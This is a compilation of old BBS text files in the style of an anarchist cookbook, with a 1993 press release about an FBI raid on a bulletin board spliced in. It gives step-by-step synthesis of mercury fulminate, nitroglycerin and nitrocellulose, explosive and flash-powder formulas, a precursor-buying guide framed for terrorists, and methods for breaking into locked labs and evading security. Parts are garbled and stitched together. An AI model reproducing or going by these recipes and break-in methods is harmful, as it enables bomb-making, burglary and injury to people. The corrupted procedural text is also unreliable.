Nitroglycerin.............   5   5   4   4   4  3.2  4   4  25  25  25  30
                                     ALL AMOUNTS ARE IN PERCENTAGES

Well, that's it for now... have fun.... hehehehehe!

USE AT YOUR OWN RISK!!!!

till later....
              (future magazines comming soon!)

----------------------------------------------------------------


                             ANARCHY 'N' EXPLOSIVES
                               VOLUME 5 -- 4/3/89

     Well, hasn't it been long since Volume 4 of Anarchy 'n' Explosives?
Well, I finally got around to typing up another volume. This one will be
dedicated to the extremely simple and more accessible explosives and
incendiaries to be prepared at home, or laboratory; depending upon the
environment you have access to or are accustomed to.

     Anyway, getting back down to business, I must (again), put up this sign:

         WARNING: THESE EXPLOSIVES/INCENDIARIES ARE REAL, NOT TOYS. USE
          EXTREME CAUTION WHEN PREPARING AND APPLYING WHEN APPLICABLE.
                 FAILURE TO DO SO MAY RESULT IN INJURY OR DEATH.
                              USE AT YOUR OWN RISK!

          Enough  of the warnings and notes; for further information and/or
     comments  on  this  series  of  ever popular explosives, contact me (I
     don't  sign  these  "publications") on the Knavery BBS at xxx-xxx-xxxx
     on  the  public message base, I should be reading some requests if you
     leave  them.  And,  volume  number 6 should be coming out sooner than
     the time between 4 and 5, but don't count on it.

BULK POWDERS:
=============

      Bulk  powders are types of gunpowders consisting of nitrocellulose and a
mixture  of  other chemically explosive solutions. These nitrocellulose fibers
are  stuck together, but are not completely collided. Some contain little else
but  nitrocellulose;  others  contain,  in  addition  to  potassium and barium
nitrates,  camphor, vaseline, paraffin, lampblack, starch, dextrine, potassium
dichromate  or  other  oxidizing  or  deterrent  salts,  and diphenylamine for
stabilization, and are colored in a variety of brilliant hues by means of col-
tar  dyes. Three typical bulk powders are made up according to the approximate
formulas tabulated below:

         Nitrocellulose........................ 84.0   87.0   89.0
           % N in nitrocellulose............... 13.2   12.9   12.9
         Potassium nitrate.....................  7.5    6.0    6.0
         Barium nitrate........................  7.5    2.0    3.0
         Starch................................  -.-    -.-    1.0
         Paraffin oil..........................  -.-    4.0    -.-
         Diphenylamine.........................  1.0    1.0    1.0

      The  mixture  is  mixed  in warm water and dried thoroughly. Then either
granulated  or  made  into powder by crushing with a wooden block and screened
through  a  12-mesh sieve. The material is then stored in a moisture-resistant
container for future or immediate use.

MERCURY FULMINATE:
==================
      Mercury  fulminate  is  an  initiating  explosive, commonly appearing as
white  or  gray  crystals.  It  is  extremely sensitive to initiation by heat,
friction,  spark  or  flame, and impact. It detonates when initiated by any of
these  means.  It  is pressed into containers, usually at 3000 psi, for use in
detonators  and blasting caps. However, when compressed at greater and greater
pressure  (up to 30,000 psi), it becomes "dead pressed." In this condition, it
can  only  be detonated by another initial detonating agent. Mercury fulminate
gradually  becomes inert when stored continuously above 100 degrees F. A dark-
colored  product  of  deterioration  gives  evidence  of  this effect. Mercury exfulminate  is  stored underwater except when there is danger of freezing. Then
it is stored under a mixture of water and alcohol.

     Preparation  of  Mercury  Fulminate. Five grams of mercury is addedExt55 
cc.  of nitric acid (specific gravity 1.42) in a 100-cc. Erlenmeyer flask, and
the  mixture  is  allowed  to stand without shaking until the mercury has gone
into  solution. The acid liquid is then poured into 50 cc. of 90% alcohol in a
500-cc.  beaker  in the hood. The temperature of the mixture rises, a vigorous
reaction  commences,  white  fumes  come  off,  and cdata  bstals of fulminate soon
begin  to precipitate. Red fumes appear and the precipitation of the fulminate
becomes  more  rapid,  then white fumes again as the reaction moderates. After
about  20  minutes, the reaction is over; water is added, and the cdata  bstals are
washed  with  water repeatedly by decantation until the washings are no longer
acid   to  litmus.  The  product  consists  of  grayish-yellow  cdata  bstals,  and
corresponds  to a good grade of commercial fulminate. It may be obtained white
and  entirely  pure  by  dissolving  in  strong  ammonia water, filtering, and
reprecipitating  by  the  addition  of  30% acetic acid. The pure fulminate is
filtered  off,  washed  several times with cold water, and stored under water,
or,  if  a very small amount is desired for experimental purposes, it is dried
in a desiccator.

AMATOL:
=======

      Description:  amatol is a high explosive, whit to buff in color. It is a
mixture  of  ammonium  nitrate and TNT, with a relative effectiveness slightly
higher  than  that  of  TNT  alone. Common compositions vary from 80% ammonium
nitrate  and  20%  TNT  to 40% ammonium nitrate and 60% TNT. Amatol is used as
the  main  bursting  charge  in  artillery  shells  and  bombs. Amatol absorbs
moisture  and  can  form dangerous compounds with copper and brass. Therefore,
it should not be housed in containers of such metals.

BLACK POWDERS:
==============

      Black  powders  burn  either  quickly  or  very  slowly depending on the
composition  of  such  a  mixture; however, these powders produce smoke, often
great  amounts,  and  is most useful in applications where smoke is no object.
It  is  the  best for communicating fire and for producing a quick, hot flame.
Black  powder  is  used  in  both  propellant  charges for shrapnel shells, in
saluting  and  blank  fire  charges, as the bursting charge of practice shells
and  bombs,  as a propelling charge in certain pyrotechnic pieces, and, either
with  or  without  the  admixture of other substances which modify the rate of
burning,  in the time-train rings and in other parts of fuses. Below is a list
of black powders and their compositions.
                                                   (Brown)
         Name                           Saltpeter  Charcoal  Sulfur
       England........................    79        (18)        3
       England........................    77.4      (17.6)      5
       Germany........................    78        (19)        3
       Germany........................    80        (20)        -
       France.........................    78        (19)        3
       Forte...........e...........e  72         15        13 |  Blasting
       Lente..........................    40         30        30 |- Black
       Ordinaire...........e..........    62         18        20 |  Powders



.FBI raids major Ohio computer bulletin board; action follows joint
investigation with SPA

The Federation Bureau of Investigation on Saturday, Jan. 30, 1993, raided
"Rusty & Edie's," a computer bulletin board located in Boardman, Ohio,
which has allegedly been illegally distributing copyrighted software
programs. Seized in the raid on the Rusty & Edie's bulletin board were
computers, hard disk drives and telecommunications equipment, as well as
financial and subscriber records. For the past several months, the Software
Publishers Association ("SPA") has been working with the FBI in
investigating the Rusty & Edie's bulletin board, and as part of that
investigation has downloaded numerous copyrighted business and
entertainment programs from the board.

The SPA investigation was initiated following the receipt of complaints
from a number of SPA members that their software was being illegally
distributed on the Rusty & Edie's BBS. The Rusty & Edie's bulletin board
was one of the largest private bulletin boards in the country.  It had 124
nodes available to callers and over 14,000 subscribers throughout the
United States and several foreign countries.  To date, the board has logged
in excess of 3.4 million phone calls, with new calls coming in at the rate
of over 4,000 per day.  It was established in 1987 and had expanded to
include over 19 gigabytes of storage housing over 100,000 files available
to subscribers for downloading. It had paid subscribers throughout the
United States and several foreign countries, including Canada, Luxembourg,
France, Germany, Finland, the Netherlands, Spain, Sweden and the United
Kingdom.

A computer bulletin board allows personal computer users to access a host
computer by a modem-equipped telephone to exchange information, including
messages, files, and computer programs.  The systems operator (Sysop) is
generally responsible for the operation of the bulletin board and
determines who is allowed to access the bulletin board and under what
conditions. For a fee of $89.00 per year, subscribers to the Rusty & Edie's
bulletin board were given access to the board's contents including many
popular copyrighted business and entertainment packages. Subscribers could
"download" or receive these files for use on their own computers without
having to pay the copyrighted owner anything for them.

"The SPA applauds the FBI's action today," said Ilene Rosenthal, general
counsel for the SPA.  "This shows that the FBI recognizes the harm that
theft of intellectual property causes to one of the U.S.'s most vibrant
industries. It clearly demonstrates a trend that the government understands
the seriousness of software piracy." The SPA is actively working with the
FBI in the investigation of computer bulletin boards, and similar raids on
other boards are expected shortly. Whether it's copied from a program
purchased at a neighborhood computer store or downloaded from a bulletin
board thousands of miles away, pirated software adds to the cost of
computing.  According to the SPA, in 1991, the software industry lost $1.2
billion in the U.S. alone. Losses internationally are several billion
dollars more.

"Many people may not realize that software pirates cause prices to be
higher, in part, to make up for publisher losses from piracy," says Ken
Wasch, executive director of the SPA.  In addition, they ruin the
reputation of the hundreds of legitimate bulletin boards that serve an
important function for computer users." The Software Publishers Association
is the principal trade association of the personal computer software
industry.  It's over 1,000 members represent the leading publishers in the
business, consumer and education software markets. The SPA has offices in
Washington DC, and Paris, France.


       CONTACT: Software Publishers Association, Washington
             Ilene Rosenthal, 202/452-1600 Ext. 318
              Terri Childs, 202/452-1600 Ext. 320

                    
                    BUYING EXPLOSIVES AND PROPELLANTS

     Almost any city or town of reasonable size has a gun store and one or
more pharmacies. These are two of the places that potential terrorists visit
in order to purchase explosive material.  All that one has to do is know
something about the non- explosive uses of the materials.  Black powder, for
example, is used in blackpowder firearms.  It comes in varying "grades", with
each different grade being a slightly different size.  The grade of black
powder depends on what the calibre of the gun that it is used in; a fine grade
of powder could burn too fast in the wrong caliber weapon.  The rule is: the
smaller the grade, the faster the burn rate of the powder.


                             BLACK POWDER

     Black powder is generally available in three grades.  As stated before, the
smaller the grade, the faster the powder burns.  Burn rate is extremely
important in bombs.  Since an explosion is a rapid increase of gas volume in a
confined environment, to make an explosion, a quick-burning powder is desirable.
The three common grades of black powder are listed below, along with the usual
bore width (calibre) of what they are used in.  Generally, the fastest burning
powder, the FFF grade is desirable.  However, the other grades and uses are
listed below:

     GRADE              BORE WIDTH               EXAMPLE OF GUN
     ÄÄÄÄÄ              ÄÄÄÄÄÄÄÄÄÄ               ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
     F                  .50 or greater           model cannon; some rifles
     FF                 .36 - .50                large pistols; small rifles
     FFF                .36 or smaller           pistols; derringers

     The FFF grade is the fastest burning, because the smaller grade has more
surface area or burning surface exposed to the flame front.  The larger grades
also have uses which will be discussed later.  The price range of black
powder, per pound, is about $8.50 - $9.00.  The price is not affected by the
grade, and so one saves oneself time and work if one buys the finer grade of
powder.  The major problems with black powder are that it can be ignited
accidentally by static electricity, and that it has a tendency to absorb
moisture from the air. To safely crush it, a one would use a plastic spoon and
a wooden salad bowl. Taking a small pile at a time, he or she would apply
pressure to the powder through the spoon and rub it in a series of strokes or
circles, but not too hard.  It is fine enough to use when it is about as fine
as flour.  The fineness, however, is dependant on what type of device one
wishes to make; obviously, it would be impracticle to crush enough powder to
fill a 1 foot by 4 inch radius pipe.  Any adult can purchase black powder,
since anyone can own black powder firearms in the United States.


                                PYRODEX

     Pyrodex is a synthetic powder that is used like black powder.  It comes
in the same grades, but it is more expensive per pound.  However, a one pound
container of pyrodex contains more material by volume than a pound of black
powder.  It is much easier to crush to a very fine powder than black powder,
and it is considerably safer and more reliable.  This is because it will not
be set off by static electricity, as black can be, and it is less inclined to
absorb moisture.  It costs about $10.00 per pound.  It can be crushed in the
same manner as black powder, or it can be dissolved in boiling water and
dried.


                        ROCKET ENGINE POWDER

     One of the most exciting hobbies nowadays is model rocketry.  Estes is
the largest producer of model rocket kits and engines.  Rocket engines are
composed of a single large grain of propellant.  This grain is surrounded by a
fairly heavy cardboard tubing.  One gets the propellant by slitting the tube
length- wise, and unwrapping it like a paper towel roll.  When this is done,
the gray fire clay at either end of the propellant grain must be removed.
This is usually done gently with a plastic or brass knife. The material is
exceptionally hard, and must be crushed to be used.  By gripping the grain in
the widest setting on a set of pliers, and putting the grain and powder in a
plastic bag, the powder will not break apart and shatter all over.  This
should be done to all the large chunks of powder, and then it should be
crushed like black powder. Rocket engines come in various sizes, ranging from
1/4 A - 2T to the incredibly powerful D engines.  The larger the engine, the
more expensive.  D engines come in packages of three, and cost about $5.00 per
package.  Rocket engines are perhaps the single most useful item sold in
stores to a terrorist, since they can be used as is, or can be cannibalized
for their explosive powder.

                       
                        RIFLE/SHOTGUN POWDER

     Rifle powder and shotgun powder are really the same from a practicle
standpoint. They are both nitrocellulose based propellants. They will be
referred to as gunpowder in all future references. Smokeless gunpowder is made
by the action of concentrated nitric and sulfuric acid upon cotton or some
other cellulose material. This material is then dissolved by solvents and then
reformed in the desired grain size.  When dealing with smokeless gunpowder,
the grain size is not nearly as important as that of black powder. Both large
and small grained smokeless powder burn fairly slowly compared to black powder
when unconfined, but when it is confined, gunpowder burns both hotter and with
more gaseous expansion, producing more pressure. Therefore, the grinding
process that is often necessary for other propellants is not necessary for
smokeless powder. owder costs about $9.00 per pound. In most states any
citizen with a valid driver's license can buy it, since there are currently
few restrictions on rifles or shotguns in the U.S. There are now ID checks in
many states when purchasing powder at a retail outlet.  Mail-orders aren't
subject to such checks.  Rifle powder and pyrodex may be purchased by mail
order, but UPS charges will be high, due to DOT regulations on packaging.


                                                  -= Exodus =-
                                                        

                              LOCKPICKING 3

     If it becomes necessary to pick a lock to enter a lab, the world's most
effective lockpick is dynamite, followed by a sledgehammer.  There are
unfortunately, problems with noise and excess structural damage with these
methods. The next best thing, however, is a set of professional lockpicks.

These, unfortunately, are difficult to acquire. If the door to a lab is locked,
but the deadbolt is not engaged, then there are other possibilities. The rule
here is: if one can see the latch, one can open the door. There are several
devices which facilitate freeing the latch from its hole in the wall. Dental
tools, stiff wire ( 20 gauge ), specially bent aluminum from cans, thin
pocket knives, and credit cards are the tools of the trade. The way that all
these tools and devices are uses is similar: pull, push, or otherwise move the
latch out of its recess in the wall, thus allowing the door to open. This is
done by sliding whatever tool that you are using behind the latch, and forcing
the latch back into the door.

Most modern doorknob locks have two fingers. The larger finger holds the door
closed while the second (smaller) finger only prevents the first finger from
being pressed in when it (the second finger) is pressed in by the catchplate
of the door.  If you can separate the catch plate and the lock sufficiently
far, the second finger will slip out enough to permit the first finger to be
slipped.

(Ill. 2.11)       ___
                 |   }   <
   Small   ->   (|   }   <--- The large (first) finger
   second        |___}   <
   finger

Some methods for getting through locked doors are:

  1) Another method of forced entry is to use an automobile jack to force the
     frame around the door out of shape, freeing the latch or exposing it to
     the above methods. This is possible because most door frames are designed
     with a slight amount of "give". Simply put the jack into position
     horizontally across the frame in the vicinity of the latch, and jack it
     out. If the frame is wood it may be possible to remove the jack after
     shutting the door, which will relock the door and leave few signs of
     forced entry. This technique will not work in concrete block buildings,
     and it's difficult to justify an auto jack to the security guards.
  2) use a screwdriver or two to pry the lock and door apart.  While holding
     them apart, try to slip the lock.  Screwdrivers, while not entirely
     innocent, are much more subtle than auto jacks, and much faster if they
     work.  If you're into unsubtle, I suppose a crowbar would work too, but
     then why bother to slip the lock at all?
  3) Find a set of double doors.  They are particularly easy to pry apart far
     enough to slip.
  4) If the lock is occasionally accessible to you while open, "adjust" or
     replace the catchplate to make it operate more suitably (i.e., work so
     that it lets *both* fingers out, so that it can always be slipped).  If
     you want, disassembling the lock and removing some of the pins can make
     it much easier to pick.
  5) If, for some odd reason, the hinges are on your side (i.e., the door
     opens outward), remove the hinge pins (provided they aren't stopped with
     welded tabs).  Unfortunately, this too lacks subtlety, in spite of its
     effectiveness.
  6) If the door cannot be slipped and you will want to get through regularly,
     break the mechanism.  Use of sufficient force to make the first finger
     retreat while the second finger is retreated will break some locks (e.g.,
     Best locks) in such a way that they may thereafter be slipped trivially,
     yet otherwise work in all normal ways.  Use of a hammer and/or
     screwdriver is recommended. Some care should be used not to damage the
     door jamb when attempting this on closed and locked doors, so as not to
     attract the attention of the users/owners/locksmith/police/....
  7) Look around in desks.  People very often leave keys to sensitive things
     in them or other obvious places.  Especially keys to shared critical
     resources, like supply rooms, that are typically key-limited but that
     everyone needs access to.  Take measurements with a micrometer, or make a
     tracing (lay key under paper and scribble on top), or be dull and make a
     wax impression.  Get blanks for the key type (can be very difficult for
     better locks; I won't go into methods, other than to say that if you can
     get other keys made from the same blank, you can often work wonders with
     a little ingenuity) and use a file to reproduce the key.  Using a
     micrometer works best:  keys made from mic measurements are more likely
     to work consistently than keys made by any other method.  If you us
     tracings, it is likely to take many tries before you obtain a key that
     works reliably.  Also, if you can 'borrow' the cylinder and disassemble
     it, pin levels can be obtained and keys constructed.
  8) Simple locks, like desks, can be picked fairly easily.  Many desks have
     simple three or four pin locks of only a few levels, and can be
     consistently picked by a patient person in a few minutes.  A small
     screwdriver and a paper clip will work wonders in practiced hands.  Apply
     a slight torque to the lock in the direction of opening with the
     screwdriver.  Then 'rake' the pins with the unfolded paper clip.  With
     practice, you'll apply enough pressure with the screwdriver that the pins
     will align properly (they'll catch on the cylinder somewhere between the
     top and bottom of their normal travel), and once they're all lined up,
     additional pressure on the screwdriver will then open the lock.  This, in
     conjunction with (7) can be very effective.  This works better with older
     or sloppily machined locks that have a fair amount of play in the
     cylinder.  Even older quality locks can be picked in this manner, if
     their cylinders have been worn enough to give enough play to allow pins
     to catch reliably. Even with a well worn quality lock, though, it
     generally takes a *lot* of patience.
  9) Custodial services often open up everything in sight and then take
     breaks.  Make the most of your opportunities.
 10) No matter what you're doing, look like you belong there.  Nothing makes
     anyone more suspicious than someone skulking about, obviously trying to
     look inconspicuous.  If there are several of you, have some innocuous and
     normal seeming warning method ("Hey, dummy!  What time is it?") so that
     they can get anything suspicious put away.  Don't travel in large groups
     at 3 AM.  Remember, more than one car thief has managed to enlist a cop's
     aid in breaking into a car.  Remember this.  Security people usually
     *like* to help people.  Don't make them suspicious or annoy them.  If you
     do run into security people, try to make sure that there won't be any
     theft or break-ins reported there the next day...
 11) Consider the possibilities of master keys.  Often, every lock in a
     building or department will have a common master (building entrance keys
     are a common exception).  Take apart some locks from different places
     that should have common masters, measure the different pin lengths in
     each, and find lengths in common.  Experiment.  Then get into those
     places you're *really* curious about.
 12) Control keys are fun, too.  These keys allow the user to remove the
     lock's core, and are generally masters.  (A pair of needle nose pliers or
     similar tool can then be used to open the lock, if desired.)


                           SLIPPING A LOCK

     The best material we've found for slips so far is soft sheet copper.  It
is quite flexible, so it can be worked into jambs easily, and can be pre-bent
as needed.  In the plane of the sheet, however, it is fairly strong, and pulls
nicely.  Of course, if they're flexible enough, credit cards, student IDs,
etc., work just fine on locks that have been made slippable if the door jamb
is wide enough.  Wonderfully subtle, quick, and delightfully effective.  Don't
leave home without one.

 (Ill. #1)

The sheet should then be folded to produce an L,J,or U shaped device that
looks like this:
                 ________________________________________
                /________________________________________|                       
               | |
               | |          L-shaped
               | |
               | |
               |_|

(Ill.  #2)
                       _____________________________
                      / ___________________________|
                     | |
                     | |     J-shaped
                     | |
                     | |________
                      \________|

(Ill.  #3)
                       _____________________
                      / ___________________|
                     | |
                     | |
                     | |     U-shaped
                     | |
                     | |____________________
                      \____________________|


We hasten to add here that many or most colleges and universities
have very strict policies about unauthorized possession of keys.  At
most, it is at least grounds for expulsion, even without filing criminal
charges.  Don't get caught with keys!!!  The homemade ones are
particularly obvious, as they don't have the usual stamps and marks
that the locksmiths put on to name and number the keys.]

we should also point out that if you make a nuisance of yourself, there are
various nasty things that can be done to catch you and/or slow you down.  For
instance, by putting special pin mechanisms in, locks can be made to trap any
key used to open them.  If you lose one this way, what can I say?  At least
don't leave fingerprints on it.  Or make sure they're someone else's.  Too
much mischief can also tempt the powers that be to rekey.



                                                 -= Exodus =-
        
        LIST OF USEFUL HOUSEHOLD CHEMICALS AND THEIR AVAILABILITY

     Anyone can get many chemicals from hardware stores, supermarkets, and
drug stores to get the materials to make explosives or other dangerous
compounds.  A would-be terrorist would merely need a station wagon and some
money to acquire many of the chemicals named here.

Chemical                Used In                         Available at
________                _______                         ____________

alcohol, ethyl *       alcoholic beverages            liquor stores
                       solvents (95% min. for both)   hardware stores

ammonia +              CLEAR household ammonia        supermarkets/7-eleven

ammonium               instant-cold paks,             drug stores,
nitrate                fertilizers                    medical supply stores

nitrous oxide          pressurizing whip cream        party supply stores
                       poppers (like CO2 ctgs.)       Head shops (The Alley at
                                                      Belmont/Clark, Chgo)

magnesium              firestarters                   surplus/camping stores

lecithin               vitamins                       pharmacies/drug stores

mineral oil            cooking, laxative              supermarket/drug stores

mercury                mercury thermometers           supermarkets,
                                                      hardware stores

sulfuric acid          uncharged car batteries        automotive stores

glycerine                                             pharmacies/drug stores

sulfur                 gardening                      gardening/hardware store

charcoal               charcoal grills                supermarkets
                                                      gardening stores

sodium nitrate         fertilizer                     gardening store

cellulose (cotton)     first aid                      drug
                                                      medical supply stores

strontium nitrate      road flares                    surplus/auto stores,

fuel oil               kerosene stoves                surplus/camping stores,

bottled gas            propane stoves                 surplus/camping stores,

potassium permanganate water purification             purification plants

hexamine or            hexamine stoves                surplus/camping stores
methenamine            (camping)

nitric acid ^          cleaning printing              printing shops             
                       plates                         photography stores

Iodine                 disinfectant (tinture)         Pharmacy, OSCO

sodium perchlorate     solidox pellets                hardware stores
                       (VERY impure)                  for cutting torches


     ^ Nitric acid is very difficult to find nowadays.  It is usually stolen
by bomb makers, or made by the process described in a later section.  A
desired concentration for making explosives about 70%.

     & The iodine sold in drug stores is usually not the pure crystaline form
that is desired for producing ammonium triiodide crystals. To obtain the pure
form, it must usually be acquired by a doctor's prescription, but this can be
expensive.  Once again, theft is the means that terrorists result to.


                                                      -= Exodus =-
                                                            '94
NITROGLYCERINE

     Nitroglycerine is one of the most sensitive explosives, if it is not the
most sensitive.  Although it is possible to make it safely, it is difficult.
Many a young anarchist has been killed or seriously injured while trying to
make the stuff.  When Nobel's factories make it, many people were killed by
the all-to-frequent factory explosions.  Usually, as soon as it is made, it is
converted into a safer substance, such as dynamite.  An idiot who attempts to
make nitroglycerine would use the following procedure:

     MATERIAL               EQUIPMENT
     ÄÄÄÄÄÄÄÄ               ÄÄÄÄÄÄÄÄÄ
     distilled water        eye-dropper

     table salt             100 ml beaker

     sodium bicarbonate     200-300 ml beakers (2)

     concentrated nitric    ice bath container
     acid (13 ml)           ( a plastic bucket serves well )

     concentrated sulfuric  centigrade thermometer
     acid (39 ml)

     glycerine              blue litmus paper


1)  Place 150 ml of distilled water into one of the 200-300 ml beakers.

2)  In the other 200-300 ml beaker, place 150 ml of distilled water and about
   a spoonful of sodium bicarbonate, and stir them until the sodium
   bicarbonate dissolves.  Do not put so much sodium bicarbonate in the water
   so that some remains undissolved.

3)  Create an ice bath by half filling the ice bath container with ice, and
   adding table salt.  This will cause the ice to melt, lowering the overall
   temperature.

4)  Place the 100 ml beaker into the ice bath, and pour the 13 ml of
   concentrated nitric acid into the 100 ml beaker.  Be sure that the beaker
   will not spill into the ice bath, and that the ice bath will not overflow
   into the beaker when more materials are added to it.  Be sure to have a
   large enough ice bath container to add more ice.  Bring the temperature of
   the acid down to about 20 degrees centigrade or less.

5)  When the nitric acid is as cold as stated above, slowly and carefully add
   the 39 ml of concentrated sulfuric acid to the nitric acid.  Mix the two
   acids together, and cool the mixed acids to 10 degrees centigrade.  It is a
   good idea to start another ice bath to do this.

6)  With the eyedropper, slowly put the glycerine into the mixed acids, one
   drop at a time.  Hold the thermometer along the top of the mixture where
   the mixed acids and glycerine meet.

      DO NOT ALLOW THE TEMPERATURE TO GET ABOVE 30 DEGREES CENTIGRADE; IF
        THE TEMPERATURE RISES ABOVE THIS TEMPERATURE, WATCH OUT !!

   The glycerine will start to nitrate immediately, and the temperature will
immediately begin to rise.  Add glycerine until there is a thin layer of
glycerine on top of the mixed acids.  It is always safest to make any
explosive in small quantities.

7)  Stir the mixed acids and glycerine for the first ten minutes of nitration,
   adding ice and salt to the ice bath to keep the temperature of the solution
   in the 100 ml beaker well below 30 degrees centigrade.  Usually, the
   nitroglycerine will form on the top of the mixed acid solution, and the
   concentrated sulfuric acid will absorb the water produced by the reaction.

8)  When the reaction is over, and when the nitroglycerine is well below 30
   degrees centigrade, slowly and carefully pour the solution of
   nitroglycerine and mixed acid into the distilled water in the beaker in
   step 1.  The nitroglycerine should settle to the bottom of the beaker, and
   the water-acid solution on top can be poured off and disposed of. Drain as
   much of the acid- water solution as possible without disturbing the
   nitroglycerine.

9)  Carefully remove the nitroglycerine with a clean eye-dropper, and place it
   into the beaker in step 2.  The sodium bicarbonate solution will eliminate
   much of the acid, which will make the nitroglycerine more stable, and less
   likely to explode for no reason, which it can do.  Test the nitroglycerine
   with the litmus paper until the litmus stays blue.  Repeat this step if
   necessary, and use new sodium bicarbonate solutions as in step 2.

10) When the nitroglycerine is as acid-free as possible, store it in a clean
   container in a safe place.  The best place to store nitroglycerine is far
   away from anything living, or from anything of any value. Nitroglycerine
   can explode for no apparent reason, even if it is stored in a secure cool
   place.


                                                    -= Exodus =-



PRODUCING CELLULOSE NITRATE   (From andrew at CMU)

 I used to make nitrocellulose, though. It was not guncotton grade, because I
didn't have oleum (H2SO4 with dissolved SO3); nevertheless it worked. At first
I got my H2SO4 from a little shop in downtown Philadelphia, which sold
soda-acid fire extinguisher refills. Not only was the acid concentrated, cheap
and plentiful, it came with enough carbonate to clean up. I'd add KNO3 and a
little water (OK, I'd add the acid to the water - but there was so little
water, what was added to what made little difference. It spattered
concentrated H2SO4 either way). Later on, when I could purchase the acids, I
believe I used 3 parts H2SO4 to 1 part HNO3. For cotton, I'd use cotton wool
or cotton cloth.

 Runaway nitration was commonplace, but it is usually not so disasterous with
nitrocellulose as it is with nitroglycerine. For some reason, I tried washing
the cotton cloth in a solution of lye, and rinsing it well in distilled water.
I let the cloth dry and then nitrated it. (Did I read this somewhere?) When
that product was nitrated, I never got a runaway reaction. BTW, water quenched
the runaway reaction of cellulose.

The product was washed thoroughly and allowed to dry. It dissolved (or turned
into mush) in acetone. It dissolved in alcohol/ether.

                                   WARNINGS

 All usual warnings regarding strong acids apply. H2SO4 likes to spatter. When
it falls on the skin, it destroys tissue - often painfully. It dissolves all
manner of clothing. Nitric also destroys skin, turning it bright yellow in the
process. Nitric is an oxidant - it can start fires. Both agents will happily
blind you if you get them in your eyes. Other warnings also apply. Not for the
novice.

 Nitrocellulose decomposes very slowly on storage if it isn't stablized. The
decomposition is auto- catalyzing, and can result in spontaneous explosion if
the material is kept confined over time. The process is much faster if the
material is not washed well enough. Nitrocellulose powders contain stabilizers
such as diphenyl amine or ethyl centralite. DO NOT ALLOW THESE TO COME INTO
CONTACT WITH NITRIC ACID!!!! A small amount of either substance will capture
the small amounts of nitrogen oxides that result from decomposition. They
therefore inhibit the autocatalysis. NC eventually will decompose in any case.

Again, this is inherently dangerous and illegal in certain areas. I got away
with it. You may kill yourself and others if you try it.

Commercially produced Nitrocellulose is stabilized by:
------------------------------------------------------


1. Spinning it in a large centrifuge to remove the remaining acid, which is
   recycled.

2. Immersion in a large quantity of fresh water.

3. Boiling it in acidulated water and washing it thoroughly with fresh water.

   If the NC is to be used as smokeless powder it is boiled in a soda solution,
then rinsed in fresh water.

   The purer the acid used (lower water content) the more complete the
nitration will be, and the more powerful the nitrocellulose produced.

   There are actually three forms of cellulose nitrate, only one of which is
useful for pyrotechnic purposes. The mononitrate and dinitrate are not
explosive, and are produced by incomplete nitration. If nitration is allowed
to proceed to complete the explosive trinatrate is formed.

(Ill. 3.22.2)


     CH OH                           CH ONO
     | 2                             | 2   2
     |                               |
     C-----O         HNO             C-----O
    /H      \           3           /H      \
 -CH         CH-O-         -->   -CH         CH-O-
    \H     H/        H SO           \H     H/
     C-----C          2  4           C-----C
     |     |                         |     |
     OH    OH                        ONO   ONO
                                        2     2

     CELLULOSE                   CELLULOSE TRINITRATE


     Ahh, fer the NEW Cookbook....

                                           -= Exodus =-  '94
FUEL-OXODIZER MIXTURES -- (AKA: Starter Explosives)

     There are nearly an infinite number of fuel-oxodizer mixtures that can be
produced by a misguided individual in his own home.  Some are very effective
and dangerous, while others are safer and less effective.  A list of working
fuel- oxodizer mixtures will be presented, but the exact measurements of each
compound are debatable for maximum effectiveness.  A rough estimate will be
given of the percentages of each fuel and oxodizer:

oxodizer, % by weight    |    fuel, % by weight  |  speed #  |  notes
============================================================================== 
potassium chlorate 67%          sulfur 33%            5   friction/impact        
                                                          sensitive; unstable

potassium chlorate 50%          sugar 35%             5   fairly slow burning;   
                                charcoal 15%              unstable

potassium chlorate 50%          sulfur 25%            8      extremely           
                                magnesium or                 unstable!
                                aluminum dust 25%

potassium chlorate 67%          magnesium or          8          unstable        
                               aluminum dust 33%

sodium nitrate 65%            magnesium dust 30%      ?        unpredictable     
                              sulfur 5%                         burn rate

potassium permanganate 60%     glycerine 40%          4     delay before         
                                                          ignition depends
WARNING: IGNITES SPONTANEOUSLY WITH GLYCERINE!!!          upon grain size

potassium permanganate 67%     sulfur 33%             5       unstable

potassium permangenate 60%     sulfur 20%             5       unstable           
                               magnesium or
                               aluminum dust 20%

potassium permanganate 50%     sugar 50%              3          ?

potassium nitrate 75%         charcoal 15%            7      this is             
                              sulfur 10%                    black powder!

potassium nitrate 60%         powdered iron           1     burns very hot       
                              or magnesium 40%

potassium chlorate 75%        phosphorus              8  used to make strike-    
                         sesquisulfide 25%            anywhere matches

ammonium perchlorate 70%     aluminum dust 30%        6     solid fuel for       
                           and small amount of               space shuttle
                           iron oxide

potassium perchlorate 67%     magnesium or           10      flash powder
(sodium perchlorate)          aluminum dust 33%

potassium perchlorate 60%    magnesium or             8      alternate
(sodium perchlorate)         aluminum dust 20%               flash powder
                             sulfur 20%

barium nitrate 30%           aluminum dust 30%        9       alternate 
potassium perchlorate 30%                                    flash powder

barium peroxide 90%          magnesium dust 5%       10       alternate          
                             aluminum dust 5%                flash powder

potassium perchlorate 50%     sulfur 25%              8       slightly           
                              magnesium or                    unstable
                              aluminum dust 25%

potassium chlorate 67%        red phosphorus 27%      7     very unstable 
calcium carbonate 3%          sulfur 3%                     impact sensitive

potassium permanganate 50%    powdered sugar 25%      7       unstable;          
                              aluminum or                     ignites if
                              magnesium dust 25%              it gets wet!

potassium chlorate 75%        charcoal dust 15%       6        unstable          
                              sulfur 10%
================================================================================

NOTE: Mixtures that uses substitutions of sodium perchlorate for potassium      
perchlorate become moisture-absorbent and less stable.

     The higher the speed number, the faster the fuel-oxodizer mixture burns
AFTER ignition.  Also, as a rule, the finer the powder, the faster the rate of
burning.

     As one can easily see, there is a wide variety of fuel-oxodizer mixtures
that can be made at home.  By altering the amounts of fuel and oxodizer(s),
different burn rates can be achieved, but this also can change the sensitivity
of the mixture.



                                                      ExoDuS 
FLASH POWDER      (By Dr. Tiel)

Here are a few basic precautions to take if you're crazy enough to produce
your own flash powder:

(1) Grind the oxidizer (KNO3, KClO3, KMnO4, KClO4 etc) separately in a
     clean vessel.

(2) NEVER grind or sift the mixed composition.

(3) Mix the composition on a large paper sheet, by rolling the composition
    back and forth.

(4) Do not store flash compositions, especially any containing Mg.

(5) Make very small quantities at first, so you can appreciate the power
    of such mixtures.

        KNO3  50%     (by weight)
        Mg    50%

